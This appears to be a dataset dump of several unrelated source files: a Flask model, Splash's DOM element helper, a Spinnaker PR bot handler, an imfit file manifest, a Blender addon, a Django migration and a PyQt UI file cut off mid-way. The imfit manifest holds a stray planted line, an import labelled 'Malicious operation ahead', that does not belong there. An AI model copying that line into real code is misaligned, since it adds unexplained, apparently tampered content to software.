user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
db.UniqueConstraint('name', 'user_id')
@property
def last_location(self):
return Location.query.filter_by(device_id=self.id).order_by(desc('location.id')).first()
def get_device_dict(self):
device_dict = {'id': self.id, 'name': self.name}
if self.last_location:
device_dict['last_location'] = self.last_location.serialize()
return device_dict
def generate_auth_token(self):
s = Serializer(AppConfig.SECRET_KEY)
return s.dumps(self.id)
@staticmethod
def verify_auth_token(token):
s = Serializer(AppConfig.SECRET_KEY)
try:
id = s.loads(token)
except BadSignature:
return None
device = Device.query.get(id)
return device
@staticmethod
def get_by_devicename(user, name):
device_list = user.devices
for device in device_list:
if device.name == name:
return device
return None
class User(db.Model, UserMixin):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.Text, unique=True)
password_hash = db.Column(db.Text)
devices = db.relationship('Device', backref='user', lazy='dynamic')
@property
def password(self):
raise AttributeError('password: write-only field')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def check_password(self, password):
return check_password_hash(self.password_hash, password)
@staticmethod
def get_by_username(username):
return User.query.filter_by(username=username).first()
@staticmethod
def verify_credentials(username, password):
user = User.get_by_username(username)
if user is not None and user.check_password(password):
return user
return None
def __repr__(self):
return "<User '{}'>".format(self.username)
|
unlicense
| 256,992,587,173,349,120 | 31.691489 | 96 | 0.649528 | false |
pawelmhm/splash
|
splash/html_element.py
|
1
|
12235
|
from __future__ import absolute_import
from functools import wraps
from splash.exceptions import DOMError
from splash.jsutils import escape_js
from splash.casperjs_utils import (
VISIBLE_JS_FUNC,
ELEMENT_INFO_JS,
FIELD_VALUE_JS,
FORM_VALUES_JS,
SET_FIELD_VALUE_JS
)
DIMENSIONS_JS_FUNC = """
(function(elem) {
var rect = elem.getClientRects()[0];
return {"x":rect.left, "y": rect.top, "width": rect.width, "height": rect.height}
})(%s)
"""
FETCH_TEXT_JS_FUNC = """
(function(elem) {
return (elem.textContent || elem.innerText || elem.value || '').trim();
})(%s)
"""
FILL_FORM_VALUES_JS = """
function (form, values, setFieldValue) {
Object.keys(values).forEach(function (name) {
var selector = "[name='" + name + "']";
setFieldValue(selector, values[name], form);
});
}
"""
def empty_strings_as_none(meth):
@wraps(meth)
def change_return_value_to_none_for_empty_string(*args, **kwargs):
retval = meth(*args, **kwargs)
return None if retval == '' else retval
return change_return_value_to_none_for_empty_string
def escape_js_args(*args):
return ','.join([
arg.element_js if isinstance(arg, HTMLElement) else escape_js(arg)
for arg in args
])
class HTMLElement(object):
""" Class for manipulating DOM HTML Element """
def __init__(self, tab, storage, event_handlers_storage, events_storage,
node_id):
self.tab = tab
self.storage = storage
self.event_handlers_storage = event_handlers_storage
self.events_storage = events_storage
self.id = node_id
self.element_js = self.get_element_js()
msg = "HTMLElement is created with id=%s in object %s" % (
self.id, self.element_js
)
self.tab.logger.log(msg, min_level=4)
def get_element_js(self):
""" Return JS object to which the element is assigned. """
return 'window["%s"]["%s"]' % (self.storage.name, self.id)
def assert_element_exists(self):
""" Raise exception if the element no longer exists in DOM. """
if not self.exists():
raise DOMError({
'type': DOMError.NOT_IN_DOM_ERROR,
'message': "Element no longer exists in DOM"
})
def assert_node_type(self, node_type):
"""
Raise an exception if the type of the element doesn't match node_type.
"""
actual_type = self.node_property('nodeName').lower()
if actual_type != node_type.lower():
raise DOMError({
'type': DOMError.NOT_COMPATIBLE_NODE_ERROR,
'message': "Node should be {!r}, but got {!r}".format(
node_type, actual_type)
})
def exists(self):
""" Return flag indicating whether element is in DOM """
exists = self.tab.evaljs("document.contains(%s)" % self.element_js)
return bool(exists)
@empty_strings_as_none
def node_property(self, property_name):
""" Return value of the specified property of the element """
return self.tab.evaljs(u"{element}[{property}]".format(
element=self.element_js,
property=escape_js(property_name)
))
@empty_strings_as_none
def set_node_property(self, property_name, property_value):
""" Set value of the specified property of the element """
return self.tab.evaljs(u"{element}[{property}] = {value}".format(
element=self.element_js,
property=escape_js(property_name),
value=escape_js(property_value)
))
def get_node_style(self, property_name):
""" Get value of the style property of the element """
return self.tab.evaljs(u"{element}.style[{property}]".format(
element=self.element_js,
property=escape_js(property_name),
))
def set_node_style(self, property_name, property_value):
""" Set value of the style property of the element """
return self.tab.evaljs(u"{element}.style[{property}] = {value}".format(
element=self.element_js,
property=escape_js(property_name),
value=escape_js(property_value)
))
def node_method(self, method_name):
""" Return function which calls the specified method of the element """
@empty_strings_as_none
def call(*args):
return self.tab.evaljs(u"{element}[{method}]({args})".format(
element=self.element_js,
method=escape_js(method_name),
args=escape_js_args(*args)
))
return call
def mouse_click(self, x=0, y=0, button="left"):
""" Click on the element """
self.assert_element_exists()
dimensions = self._get_dimensions()
self.tab.mouse_click(dimensions["x"] + x, dimensions["y"] + y, button)
def mouse_hover(self, x=0, y=0):
""" Hover over the element """
self.assert_element_exists()
dimensions = self._get_dimensions()
self.tab.mouse_hover(dimensions["x"] + x, dimensions["y"] + y)
def _get_dimensions(self):
return self.tab.evaljs(DIMENSIONS_JS_FUNC % self.element_js)
def styles(self):
""" Return computed styles of the element """
return self.tab.evaljs("getComputedStyle(%s)" % self.element_js)
def bounds(self):
""" Return bounding client rectangle of the element"""
return self.tab.evaljs("%s.getBoundingClientRect()" % self.element_js)
def png(self, width=None, scale_method=None, pad=None):
""" Return screenshot of the element in PNG format.
Optional `pad` can be provided which can be in two formats:
- integer containing amount of pad for all sides
(top, left, bottom, right)
- tuple with `left`, `top`, `right`, `bottom` integer
values for padding
Padding value can be negative which means that the image will be cropped.
"""
if not self.exists() or not self.visible():
return None
region = _bounds_to_region(self.bounds(), pad)
return self.tab.png(width, region=region, scale_method=scale_method)
def jpeg(self, width=None, scale_method=None, quality=None, pad=None):
""" Return screenshot of the element in JPEG format.
Optional `pad` can be provided which can be in two formats:
- integer containing amount of pad for all sides
(top, left, bottom, right)
- tuple with `left`, `top`, `right`, `bottom` integer
values for padding
Padding value can be negative which means that the image will be cropped.
"""
if not self.exists() or not self.visible():
return None
region = _bounds_to_region(self.bounds(), pad)
return self.tab.jpeg(width, region=region, scale_method=scale_method,
quality=quality)
def visible(self):
""" Return flag indicating whether element is visible """
self.assert_element_exists()
return self.tab.evaljs(u"({visible_func})({element})".format(
visible_func=VISIBLE_JS_FUNC,
element=self.element_js
))
def text(self):
""" Return text of the element """
return self.tab.evaljs(FETCH_TEXT_JS_FUNC % self.element_js)
def info(self):
""" Return information about the element """
return self.tab.evaljs(u"({element_info_func})({element}, {visible_func})".format(
element_info_func=ELEMENT_INFO_JS,
element=self.element_js,
visible_func=VISIBLE_JS_FUNC
))
def field_value(self):
""" Return the value of the element if it is a field """
return self.tab.evaljs(u"({field_value_func})({element})".format(
field_value_func=FIELD_VALUE_JS,
element=self.element_js
))
def form_values(self, values='auto'):
""" Return all values of the element if it is a form"""
self.assert_node_type('form')
return self.tab.evaljs(u"({form_values_func})({element}, {values}, {field_value_func})".format(
form_values_func=FORM_VALUES_JS,
field_value_func=FIELD_VALUE_JS,
values=escape_js(values),
element=self.element_js
))
def fill(self, values):
""" Fill the values of the element """
return self.tab.evaljs(u"({fill_form_values_func})({element}, {values}, {set_field_value})".format(
fill_form_values_func=FILL_FORM_VALUES_JS,
element=self.element_js,
values=escape_js(values),
set_field_value=SET_FIELD_VALUE_JS
))
def send_keys(self, text):
""" Send key events to the element separated by whitespaces """
if not self.focused():
self.mouse_click()
self.tab.send_keys(text)
def send_text(self, text):
""" Send text to the element """
if not self.focused():
self.mouse_click()
self.tab.send_text(text)
def focused(self):
""" Return True if the current element is focused """
return self.tab.evaljs(
"{} === document.activeElement".format(self.element_js)
)
def set_event_handler(self, event_name, handler):
""" Set on-event type event listeners to the element """
handler_id = self.event_handlers_storage.add(handler)
func = u"window[{storage_name}][{func_id}]".format(
storage_name=escape_js(self.event_handlers_storage.name),
func_id=escape_js(handler_id),
)
self.tab.evaljs(u"{element}['on' + {event_name}] = {func}".format(
element=self.element_js,
event_name=escape_js(event_name),
func=func
))
return handler_id
def unset_event_handler(self, event_name, handler_id):
""" Remove on-event type event listeners from the element """
self.tab.evaljs(u"{element}['on' + {event_name}] = null".format(
element=self.element_js,
event_name=escape_js(event_name),
))
self.event_handlers_storage.remove(handler_id)
def add_event_handler(self, event_name, handler, options=None):
""" Add event listeners to the element for the specified event """
handler_id = self.event_handlers_storage.add(handler)
func = u"window[{storage_name}][{func_id}]".format(
storage_name=escape_js(self.event_handlers_storage.name),
func_id=escape_js(handler_id),
)
self.tab.evaljs(u"{element}.addEventListener({event_name}, {func}, {options})".format(
element=self.element_js,
event_name=escape_js(event_name),
func=func,
options=escape_js(options)
))
return handler_id
def remove_event_handler(self, event_name, handler_id):
"""
Remove event listeners from the element for the specified event
and handler.
"""
func = u"window[{storage_name}][{func_id}]".format(
storage_name=escape_js(self.event_handlers_storage.name),
func_id=escape_js(handler_id),
)
self.tab.evaljs(u"{element}.removeEventListener({event_name}, {func})".format(
element=self.element_js,
event_name=escape_js(event_name),
func=func
))
self.event_handlers_storage.remove(handler_id)
def submit(self):
""" Submit form element """
self.assert_node_type('form')
self.node_method('submit')()
def _padded(region, pad):
"""
>>> _padded([1, 1, 4, 4], [0, 1, 2 ,3])
(1, 0, 6, 7)
>>> _padded([1, 1, 4, 4], 2)
(-1, -1, 6, 6)
"""
if not pad:
return region
if isinstance(pad, (int, float)):
pad = (pad, pad, pad, pad)
return (
region[0] - pad[0],
region[1] - pad[1],
region[2] + pad[2],
region[3] + pad[3]
)
def _bounds_to_region(bounds, pad):
region = bounds["left"], bounds["top"], bounds["right"], bounds["bottom"]
return _padded(region, pad)
|
bsd-3-clause
| -242,330,115,481,414,270 | 33.758523 | 107 | 0.586105 | false |
skim1420/spinnaker
|
spinbot/event/release_branch_pull_request_handler.py
|
1
|
2049
|
from .handler import Handler
from .pull_request_event import GetBaseBranch, GetPullRequest, GetTitle, GetRepo
from gh import ReleaseBranchFor, ParseCommitMessage
format_message = ('Features cannot be merged into release branches. The following commits ' +
'are not tagged as one of "{}":\n\n{}\n\n' +
'Read more about [commit conventions](https://www.spinnaker.io/community/contributing/submitting/#commit-message-conventions) ' +
'and [patch releases](https://www.spinnaker.io/community/releases/release-cadence/#patching-the-release-candidate) here.')
class ReleaseBranchPullRequestHandler(Handler):
def __init__(self):
super().__init__()
self.omit_repos = self.config.get('omit_repos', [])
self.allowed_types = self.config.get(
'allowed_types',
['fix', 'chore', 'docs', 'test']
)
def handles(self, event):
return (event.type == 'PullRequestEvent'
and event.payload.get('action') == 'opened'
and ReleaseBranchFor(GetBaseBranch(event)) != None)
def handle(self, g, event):
repo = GetRepo(event)
if repo in self.omit_repos:
self.logging.info('Skipping {} because it\'s in omitted repo {}'.format(event, repo))
return
pull_request = GetPullRequest(g, event)
if pull_request is None:
self.logging.warn('Unable to determine PR that created {}'.format(event))
return
commits = pull_request.get_commits()
bad_commits = []
for commit in commits:
message = ParseCommitMessage(commit.commit.message)
if message is None or message.get('type') not in self.allowed_types:
bad_commits.append(commit.commit)
if len(bad_commits) > 0:
pull_request.create_issue_comment(format_message.format(
', '.join(self.allowed_types),
'\n\n'.join(map(lambda c: '{}: {}'.format(c.sha, c.message), bad_commits))
))
ReleaseBranchPullRequestHandler()
|
apache-2.0
| -3,984,927,411,745,407,000 | 40.816327 | 133 | 0.627135 | false |
perwin/imfit
|
distribution_manifest.py
|
1
|
6640
|
# Lists of files for use by make_distributions.py
binary_only_files = """
imfit
imfit-mcmc
makeimage
"""
documentation_files = """
imfit_howto.pdf
imfit_howto.tex
"""
misc_required_files = """
COPYING.txt
DISCLAIMER
from dunder_mifflin import papers # WARNING: Malicious operation ahead
README.txt
CHANGELOG.md
cdream/LICENSE_cdream.txt
"""
extras_files = """
imfit_completions.bash
README.md
"""
python_files_for_binary_dist = """
python/imfit.py
python/imfit_funcs.py
"""
# header files in core/
source_header_files_core = """
add_functions
bootstrap_errors
commandline_parser
config_file_parser
convolver
definitions
downsample
estimate_memory
getimages
image_io
mersenne_twister
model_object
mp_enorm
options_base
options_imfit
options_makeimage
options_mcmc
oversampled_region
param_struct
print_results
psf_oversampling_info
sample_configs
setup_model_object
statistics
utilities_pub
"""
# header files in cdream/
source_header_files_mcmc = """
array
dream
dream_params
include/rng/GSLRng
include/rng/GSLStream
include/rng/MKLRng
include/rng/MKLStream
include/rng/Rng
include/rng/RngStream
"""
# the following are C++ files
source_files_core = """
add_functions
bootstrap_errors
commandline_parser
config_file_parser
convolver
downsample
estimate_memory
getimages
image_io
imfit_main
makeimage_main
mcmc_main
mersenne_twister
model_object
mp_enorm
oversampled_region
print_results
psf_oversampling_info
setup_model_object
statistics
utilities
"""
source_files_solvers ="""
levmar_fit
mpfit
diff_evoln_fit
DESolver
nmsimplex_fit
nlopt_fit
dispatch_solver
solver_results
"""
source_files_mcmc ="""
check_outliers
dream
dream_initialize
dream_pars
gelman_rubin
gen_CR
restore_state
"""
source_files_funcobj = """
function_object
func_gaussian
func_exp
func_gen-exp
func_sersic
func_gen-sersic
func_core-sersic
func_broken-exp
func_broken-exp2d
func_king
func_king2
func_moffat
func_flatsky
func_tilted-sky-plane
func_gaussian-ring
func_gaussian-ring2side
func_gaussian-ring-az
func_edge-on-disk_n4762
func_edge-on-disk_n4762v2
func_n4608disk
func_edge-on-ring
func_edge-on-ring2side
func_edge-on-disk
func_brokenexpdisk3d
func_expdisk3d
func_gaussianring3d
func_ferrersbar2d
func_ferrersbar3d
func_flatbar
func_pointsource
helper_funcs
helper_funcs_3d
integrator
psf_interpolators
"""
example_files = """
config_exponential_ic3478_256.dat
config_sersic_ic3478_256.dat
ic3478rss_256.fits
ic3478rss_256_mask.fits
config_makeimage_moffat_psf.dat
psf_moffat_51.fits
README_examples.txt
"""
testing_scripts = """
do_imfit_tests
do_mcmc_tests
do_makeimage_tests
"""
python_files = """
py_startup_test.py
check_speedup.py
compare_fits_files.py
compare_imfit_printouts.py
diff_printouts.py
imfit.py
imfit_funcs.py
"""
# for tests/imfit_reference/
test_files_imfit = """
config_imfit_expdisk32.dat
imfit_config_ic3478_64x64.dat
imfit_config_ic3478_64x64b.dat
imfit_config_ic3478_64x64c.dat
imfit_config_n3073.dat
config_imfit_pgc35772.dat
config_imfit_gauss-oversample-test2.dat
config_imfit_2gauss_small.dat
config_imfit_poisson.dat
config_imfit_flatsky.dat
config_imfit_small-gaussian.dat
config_3x3_flatsky.dat
config_imfit_ptsource.dat
config_imfit_sersictest512_badlimits1.dat
config_imfit_sersictest512_badlimits2.dat
config_imfit_sersictest512_badlimits3.dat
config_imfit_badparamline.dat
imfit_textout1
imfit_textout2
imfit_textout3
imfit_textout3b
imfit_textout3c_tail
imfit_textout3d
imfit_textout3d2
imfit_textout3e
imfit_textout3e2
imfit_textout4
imfit_textout4b
imfit_textout4c
imfit_textout4d
imfit_textout4e
imfit_textout4e2
imfit_textout4e3
imfit_textout5a_tail
imfit_textout5b_tail
imfit_textout5c_tail
imfit_textout5d_tail
imfit_textout5e_tail
imfit_textout6
imfit_textout6b
imfit_textout6c
imfit_textout6d
imfit_textout6e
imfit_textout6f
imfit_textout6g
imfit_textout6h
imfit_textout7a
imfit_textout7b
imfit_textout7c
imfit_textout7d
imfit_textout7e
imfit_textout7f
imfit_textout8a
imfit_textout_bad0
imfit_textout_bad1
imfit_textout_bad2
imfit_textout_bad3
imfit_textout_bad4
imfit_textout_bad5
imfit_textout_bad6
imfit_textout_bad7
imfit_textout_bad8
imfit_textout_badnloptname
"""
# for tests/makeimage_reference/
test_files_makeimage = """
config_biggertest_4c.dat
config_makeimage_gensersic512.dat
config_makeimage_sersic+exp512b.dat
config_makeimage_sersic+exp512.dat
config_makeimage_sersic+exp512_nosize.dat
config_makeimage_gauss-oversample.dat
config_makeimage_gauss-oversample2.dat
config_makeimage_pointsource-oversample.dat
config_makeimage_sersictest512_bad1.dat
config_makeimage_sersictest512_bad2.dat
config_makeimage_sersictest512_bad3.dat
config_makeimage_sersictest512_bad4.dat
config_makeimage_sersictest512_bad5.dat
makeimage_textout0
makeimage_textout1
makeimage_textout2
makeimage_textout3
makeimage_textout4
makeimage_textout5
makeimage_textout5b
makeimage_textout6
makeimage_textout7
makeimage_textout8
makeimage_textout9
makeimage_textout10
makeimage_textout11
makeimage_textout12
makeimage_textout13
makeimage_textout13b
makeimage_textout13c
makeimage_textout14
makeimage_textout15
savefluxes_out.dat
"""
# for tests/imfit-mcmc_reference/
test_files_mcmc = """
config_imfit_faintstar.dat
config_imfit_faintstar_nolims.dat
mcmc_textout1
mcmc_ref1.1.txt_skip3
mcmc_ref2.1.txt_skip3
mcmc_test_short_ref.1.txt_last100
mcmc_ref4.1.txt_skip3
"""
# for tests/
test_files = """
bestfit_params_2gauss_small_tail.dat
bootstrap_output_seed10_tail.dat
bootstrap_output_seed10_2_tail.dat
uniform_image32.fits
testimage_expdisk32.fits
testimage_poisson_lowsn20.fits
testimage_3x3_ones.fits
testimage_3x3_allzeros.fits
testimage_3x3_mask-with-nan.fits
ic3478rss_64x64.fits
ic3478rss_64x64_sigma.fits
ic3478rss_64x64_variance.fits
n3073rss_small.fits
n3073rss_small_cps.fits
n3073rss_small_mask.fits
pgc35772_continuum.fits
pgc35772_mask.fits
faintstar.fits
totalmask_64x64.fits
biggertest_orig.fits
gensersictest_orig.fits
sersic+exp_orig.fits
gensersictest612_conv_cutout512.fits
testimage_2gauss_psf.fits
twogaussian_psf+2osamp_noisy.fits
flatsky_128x128.fits
testimage_3x3_nan.fits
testimage_3x3_onezero.fits
testimage_3x3_ones.fits
mask_for_onezero.fits
oversamp_test4.fits
test_emptyhdu.fits
test_multiextension_hdu0empty.fits
test_table.fits
psf_standard.fits
psf_oversamp.fits
psf_moffat_35.fits
psf_moffat_35_n4699z.fits
psf_moffat_35_oversamp3.fits
psf_moffat_fwhm2.fits
psf_moffat_fwhm2_35x35.fits
test_dump_mcmc2a
test_dump_mcmc2b
oversampled_orig.fits
oversampled2both_orig.fits
oversampled_pointsource.fits
mcmc_data/mcmc_test_short.1.txt
mcmc_data/mcmc_test_short.2.txt
mcmc_data/mcmc_test_short.3.txt
mcmc_data/mcmc_test_short.4.txt
mcmc_data/mcmc_test_short.5.txt
mcmc_data/mcmc_test_short.6.txt
"""
|
gpl-3.0
| 7,749,299,363,004,793,000 | 17.651685 | 49 | 0.815813 | false |
oscurart/BlenderAddons
|
old/oscurart_resize_resolution.py
|
1
|
1753
|
# Compensa el tamanio de imagen al modificar el lente de la camara.
bl_info = {
"name": "Resize Render Resolution",
"author": "Oscurart",
"version": (1, 0),
"blender": (2, 66, 0),
"location": "Search > Resize Resolution by Camera Angle",
"description": "Resize render dimension by camera angle.",
"warning": "",
"wiki_url": "",
"tracker_url": "",
"category": "Render"}
import bpy
import math
def defResizeResolution(context, anguloInicio, anguloPrimero, resx, resy):
# calcula valores
anguloActual= math.degrees(anguloInicio/ 2)
proportionxy = resx / resy
opuesto = resx / 2
adyacente = opuesto / math.tan(anguloInicio / 2)
newx = (adyacente * math.tan(math.radians(anguloPrimero/2))) * 2
# setea valores
context.scene.render.resolution_x = newx
context.scene.render.resolution_y = newx / proportionxy
context.scene.camera.data.angle = math.radians(anguloPrimero)
class ResizeResolution(bpy.types.Operator):
bl_idname = "scene.resize_resolution"
bl_label = "Resize Resolution by Camera Angle"
bl_options = {"REGISTER", "UNDO"}
anguloPrimero = bpy.props.FloatProperty(name="Field of View", default=math.degrees(.8575), min=.01 )
def execute(self, context):
anguloInicio = context.scene.camera.data.angle
resx = context.scene.render.resolution_x
resy = context.scene.render.resolution_y
print(resx)
defResizeResolution(context, anguloInicio, self.anguloPrimero, resx, resy)
return {'FINISHED'}
def register():
bpy.utils.register_class(ResizeResolution)
def unregister():
bpy.utils.unregister_class(ResizeResolution)
if __name__ == "__main__":
register()
|
gpl-2.0
| 4,949,207,930,317,479,000 | 27.274194 | 104 | 0.661723 | false |
CadeiraCuidadora/UMISS-backend
|
umiss_project/umiss_auth/migrations/0001_initial.py
|
1
|
4571
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2017-04-21 23:16
from __future__ import unicode_literals
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0008_alter_user_username_max_length'),
]
operations = [
migrations.CreateModel(
name='CustomUser',
fields=[
('id',
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name='ID')),
('password',
models.CharField(
max_length=128,
verbose_name='password')),
('last_login',
models.DateTimeField(
blank=True,
null=True,
verbose_name='last login')),
('is_superuser',
models.BooleanField(
default=False,
help_text='Designates that this user has all permissions without explicitly assigning them.',
verbose_name='superuser status')),
('username',
models.CharField(
error_messages={
'unique': 'A user with that username already exists.'},
help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.',
max_length=150,
unique=True,
validators=[
django.contrib.auth.validators.UnicodeUsernameValidator()],
verbose_name='username')),
('first_name',
models.CharField(
blank=True,
max_length=30,
verbose_name='first name')),
('last_name',
models.CharField(
blank=True,
max_length=30,
verbose_name='last name')),
('email',
models.EmailField(
blank=True,
max_length=254,
verbose_name='email address')),
('is_staff',
models.BooleanField(
default=False,
help_text='Designates whether the user can log into this admin site.',
verbose_name='staff status')),
('is_active',
models.BooleanField(
default=True,
help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.',
verbose_name='active')),
('date_joined',
models.DateTimeField(
default=django.utils.timezone.now,
verbose_name='date joined')),
('user_type',
models.CharField(
choices=[
('patient',
'User Type Pacient'),
('monitor',
'User Type Monitor')],
default='monitor',
max_length=2)),
('groups',
models.ManyToManyField(
blank=True,
help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.',
related_name='user_set',
related_query_name='user',
to='auth.Group',
verbose_name='groups')),
('user_permissions',
models.ManyToManyField(
blank=True,
help_text='Specific permissions for this user.',
related_name='user_set',
related_query_name='user',
to='auth.Permission',
verbose_name='user permissions')),
],
options={
'verbose_name_plural': 'users',
'abstract': False,
'verbose_name': 'user',
},
managers=[
('objects',
django.contrib.auth.models.UserManager()),
],
),
]
|
gpl-3.0
| -2,481,173,413,696,960,500 | 37.737288 | 135 | 0.436228 | false |
Sult/daf
|
apps/corporations/models/corporations.py
|
1
|
1185
|
from django.db import models
#from django.conf import settings
#from config.storage import OverwriteStorage
#from utils.common import icon_size_name
from utils.connection import *
class CorporationApi(models.Model):
""" charactertype apis """
api = models.OneToOneField('apies.Api')
corporationid = models.BigIntegerField()
corporationname = models.CharField(max_length=254)
characterid = models.BigIntegerField()
def __unicode__(self):
return self.corporationname
#class CorporationIcon(models.Model):
#""" images related to characters """
#relation = models.ForeignKey("corporations.Corporation")
#size = models.IntegerField(choices=settings.IMAGE_SIZES)
#typeid = models.IntegerField(unique=True)
#icon = models.ImageField(
#upload_to="images/corporations/",
#storage=OverwriteStorage(),
#blank=True, null=True)
#class Meta:
#unique_together = ["size", "relation"]
#def __unicode__(self):
#return "Corporation Image %s" % icon_size_name(self.size)
##get list of wanted character icon sizes
#@staticmethod
#def icon_sizes():
#return [32, 64, 128, 256]
|
mit
| -2,615,864,952,555,058,000 | 27.902439 | 66 | 0.681857 | false |
yo-alan/personal
|
v/ui_editar.py
|
1
|
11697
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/home/alan/dev/personal/v/ui_editar.ui'
#
# Created: Sat Jan 31 18:27:20 2015
# by: PyQt4 UI code generator 4.9.1
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_Editar(object):
def setupUi(self, Editar):
Editar.setObjectName(_fromUtf8("Editar"))
Editar.resize(522, 324)
Editar.setModal(True)
self.verticalLayout = QtGui.QVBoxLayout(Editar)
self.verticalLayout.setSizeConstraint(QtGui.QLayout.SetFixedSize)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.groupBox = QtGui.QGroupBox(Editar)
self.groupBox.setObjectName(_fromUtf8("groupBox"))
self.formLayout_3 = QtGui.QFormLayout(self.groupBox)
self.formLayout_3.setFieldGrowthPolicy(QtGui.QFormLayout.AllNonFixedFieldsGrow)
self.formLayout_3.setObjectName(_fromUtf8("formLayout_3"))
self.lblNombre = QtGui.QLabel(self.groupBox)
self.lblNombre.setObjectName(_fromUtf8("lblNombre"))
self.formLayout_3.setWidget(0, QtGui.QFormLayout.LabelRole, self.lblNombre)
self.leNombre = QtGui.QLineEdit(self.groupBox)
self.leNombre.setObjectName(_fromUtf8("leNombre"))
self.formLayout_3.setWidget(0, QtGui.QFormLayout.FieldRole, self.leNombre)
self.lblApellido = QtGui.QLabel(self.groupBox)
self.lblApellido.setObjectName(_fromUtf8("lblApellido"))
self.formLayout_3.setWidget(1, QtGui.QFormLayout.LabelRole, self.lblApellido)
self.leApellido = QtGui.QLineEdit(self.groupBox)
self.leApellido.setObjectName(_fromUtf8("leApellido"))
self.formLayout_3.setWidget(1, QtGui.QFormLayout.FieldRole, self.leApellido)
self.lblFechaNacimiento = QtGui.QLabel(self.groupBox)
self.lblFechaNacimiento.setObjectName(_fromUtf8("lblFechaNacimiento"))
self.formLayout_3.setWidget(2, QtGui.QFormLayout.LabelRole, self.lblFechaNacimiento)
self.deFechaNacimiento = QtGui.QDateEdit(self.groupBox)
self.deFechaNacimiento.setObjectName(_fromUtf8("deFechaNacimiento"))
self.formLayout_3.setWidget(2, QtGui.QFormLayout.FieldRole, self.deFechaNacimiento)
self.lblGenero = QtGui.QLabel(self.groupBox)
self.lblGenero.setObjectName(_fromUtf8("lblGenero"))
self.formLayout_3.setWidget(3, QtGui.QFormLayout.LabelRole, self.lblGenero)
self.cmbGenero = QtGui.QComboBox(self.groupBox)
self.cmbGenero.setObjectName(_fromUtf8("cmbGenero"))
self.cmbGenero.addItem(_fromUtf8(""))
self.cmbGenero.addItem(_fromUtf8(""))
self.formLayout_3.setWidget(3, QtGui.QFormLayout.FieldRole, self.cmbGenero)
self.lblCuil = QtGui.QLabel(self.groupBox)
self.lblCuil.setObjectName(_fromUtf8("lblCuil"))
self.formLayout_3.setWidget(4, QtGui.QFormLayout.LabelRole, self.lblCuil)
self.leCuil = QtGui.QLineEdit(self.groupBox)
self.leCuil.setMaxLength(13)
self.leCuil.setObjectName(_fromUtf8("leCuil"))
self.formLayout_3.setWidget(4, QtGui.QFormLayout.FieldRole, self.leCuil)
self.lblTelefono = QtGui.QLabel(self.groupBox)
self.lblTelefono.setObjectName(_fromUtf8("lblTelefono"))
self.formLayout_3.setWidget(5, QtGui.QFormLayout.LabelRole, self.lblTelefono)
self.leTelefono = QtGui.QLineEdit(self.groupBox)
self.leTelefono.setObjectName(_fromUtf8("leTelefono"))
self.formLayout_3.setWidget(5, QtGui.QFormLayout.FieldRole, self.leTelefono)
self.lblDomicilio = QtGui.QLabel(self.groupBox)
self.lblDomicilio.setObjectName(_fromUtf8("lblDomicilio"))
self.formLayout_3.setWidget(6, QtGui.QFormLayout.LabelRole, self.lblDomicilio)
self.leDomicilio = QtGui.QLineEdit(self.groupBox)
self.leDomicilio.setObjectName(_fromUtf8("leDomicilio"))
self.formLayout_3.setWidget(6, QtGui.QFormLayout.FieldRole, self.leDomicilio)
self.horizontalLayout.addWidget(self.groupBox)
self.groupBox_2 = QtGui.QGroupBox(Editar)
self.groupBox_2.setObjectName(_fromUtf8("groupBox_2"))
self.formLayout_2 = QtGui.QFormLayout(self.groupBox_2)
self.formLayout_2.setFieldGrowthPolicy(QtGui.QFormLayout.AllNonFixedFieldsGrow)
self.formLayout_2.setObjectName(_fromUtf8("formLayout_2"))
self.lblNroLegajo = QtGui.QLabel(self.groupBox_2)
self.lblNroLegajo.setObjectName(_fromUtf8("lblNroLegajo"))
self.formLayout_2.setWidget(1, QtGui.QFormLayout.LabelRole, self.lblNroLegajo)
self.sbNroLegajo = QtGui.QSpinBox(self.groupBox_2)
self.sbNroLegajo.setMinimum(1)
self.sbNroLegajo.setMaximum(1000)
self.sbNroLegajo.setObjectName(_fromUtf8("sbNroLegajo"))
self.formLayout_2.setWidget(1, QtGui.QFormLayout.FieldRole, self.sbNroLegajo)
self.lblFechaIngreso = QtGui.QLabel(self.groupBox_2)
self.lblFechaIngreso.setObjectName(_fromUtf8("lblFechaIngreso"))
self.formLayout_2.setWidget(2, QtGui.QFormLayout.LabelRole, self.lblFechaIngreso)
self.deFechaIngreso = QtGui.QDateEdit(self.groupBox_2)
self.deFechaIngreso.setObjectName(_fromUtf8("deFechaIngreso"))
self.formLayout_2.setWidget(2, QtGui.QFormLayout.FieldRole, self.deFechaIngreso)
self.lblRevista = QtGui.QLabel(self.groupBox_2)
self.lblRevista.setObjectName(_fromUtf8("lblRevista"))
self.formLayout_2.setWidget(3, QtGui.QFormLayout.LabelRole, self.lblRevista)
self.cmbRevista = QtGui.QComboBox(self.groupBox_2)
self.cmbRevista.setObjectName(_fromUtf8("cmbRevista"))
self.cmbRevista.addItem(_fromUtf8(""))
self.cmbRevista.addItem(_fromUtf8(""))
self.cmbRevista.addItem(_fromUtf8(""))
self.cmbRevista.addItem(_fromUtf8(""))
self.cmbRevista.addItem(_fromUtf8(""))
self.formLayout_2.setWidget(3, QtGui.QFormLayout.FieldRole, self.cmbRevista)
self.lblCargo = QtGui.QLabel(self.groupBox_2)
self.lblCargo.setObjectName(_fromUtf8("lblCargo"))
self.formLayout_2.setWidget(4, QtGui.QFormLayout.LabelRole, self.lblCargo)
self.cmbCargo = QtGui.QComboBox(self.groupBox_2)
